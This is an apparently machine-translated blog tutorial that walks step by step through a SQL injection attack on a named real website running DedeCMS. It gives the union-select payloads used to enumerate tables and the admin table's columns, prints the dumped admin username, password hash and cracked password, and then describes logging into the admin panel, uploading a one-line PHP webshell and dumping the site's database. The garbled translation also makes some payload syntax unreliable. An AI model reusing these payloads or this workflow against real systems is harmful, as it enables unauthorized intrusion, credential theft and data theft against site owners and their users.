Php + mysql hands-on shell tutorial

Php + mysql hands-on shell tutorial
Note: This article is intended for those who do not fully understand injection!

 

Target Site: http://www.51team.cn/

 

Injection point: http://www.51team.cn/newmess.php? Id = 138

 

Find the injection point and guess the field. You can use order by 1 to guess. When order by is unavailable, you can use union to join queries!

 

I guess the obtained field is 22 ,:


 

Next, the display space will pop up! Syntax: and 1 = 2 union select1, 2, 4, 5,..., 22: The number of fields is the same!

 

Then press enter to open the page. A number of 9 is displayed!


 

Then let's query the version, user name, and database!

 

Version (): database (): The current database user (). If you want to query the information, replace the display bit 9 that just exists,


 

This is the version number. to query the user name, replace 9 in the browser with user!

 

This is what I found out.

 

Version: 5.1.32-community

Database: 51 teamcom

Username: 51. The same is true for teamcom databases and usernames!

 

Next, let's report the statement. Syntax: FROM information_schema.TABLESwhere table_schema = database () limit 0 and 1

 

Change 9 to table_name, and press Enter. You will see the table. The first table is dede_addonarticle. We only need to expose the Administrator table!

 

We continue to blow up. Each time we blow up one, we have to change the syntax limit 0 and 1 to 1 when it hits 2nd. For example, when limit 3rd hits, we continue to add 1, for example: in limit 2, 1 php, 0 is the first!

 

Here is the table I popped up:

 

Dede_addonproduct, dede_admin, dede_admintype, role, dede_channeltype, role, dede_flink, dede_flinktype, role, dede_homepageset

 

Dream weaving program!

 

Here, dede_admin should be the administrator's table! Let's take a look!

 

Before the crash, we need to convert dede_admin to a hexadecimal value, which is 646562135f61646d696e.

 

Syntax: information_schema.columns WHEREtable_name = 0x646562135f61646d696e limit0. 1 is the same as above. Change the number 0 when the number is first, and put the hexadecimal value we just converted to the back of 0x, then, change the number with the digit 9 to column_name!

 

My burst segments: id, userid, pwd, uname, tname, email pwd should be the password, and uname should be the account. Let's try it!

 

And 1 = 2 union select 1, 2, 3, 4, 5, 6..., 22 from dede_admin remove all the syntaxes in the browser, with the ** entry point left. That's all;

 

Http://www.51team.cn/about.php? Id = 10 and 1 = 2 unionselect 1, 2, 3, 4, 5, 6..., 22 from dede_admin and press Enter!

 

Then, replace 9 with the fields I just exploded. I replaced uname and pwd with two browsers!

 

The user is admin and the password is d9d2b2de067864194059. The password can be decrypted at cmd5.com.


 

The password has been solved. This is bx2013. Next, find the background. You can use the software or Google to find it! I found out:

 

Http://www.51team.cn/web_admin/login.php

 

Login successful:

 

You just need to find an upload point, and then upload the horse, and upload a txt file first. Hey hey! Http://www.51team.cn/a.txt

 

Next, take off your pants!

 

You can upload your pants and horse, or use a kitchen knife. I will use a kitchen knife for convenience! Add a sentence to a PHP file!

 

OK. Connected

 

 

If you are using network horse, you have to check the database username and password in the website configuration file conn. php!

 

After the connection, click the website list, right-click the website and choose database management. Then, a window is opened, which is the database!

 

Welcome to group: QQ group: 252799167

This article is from the "lei" blog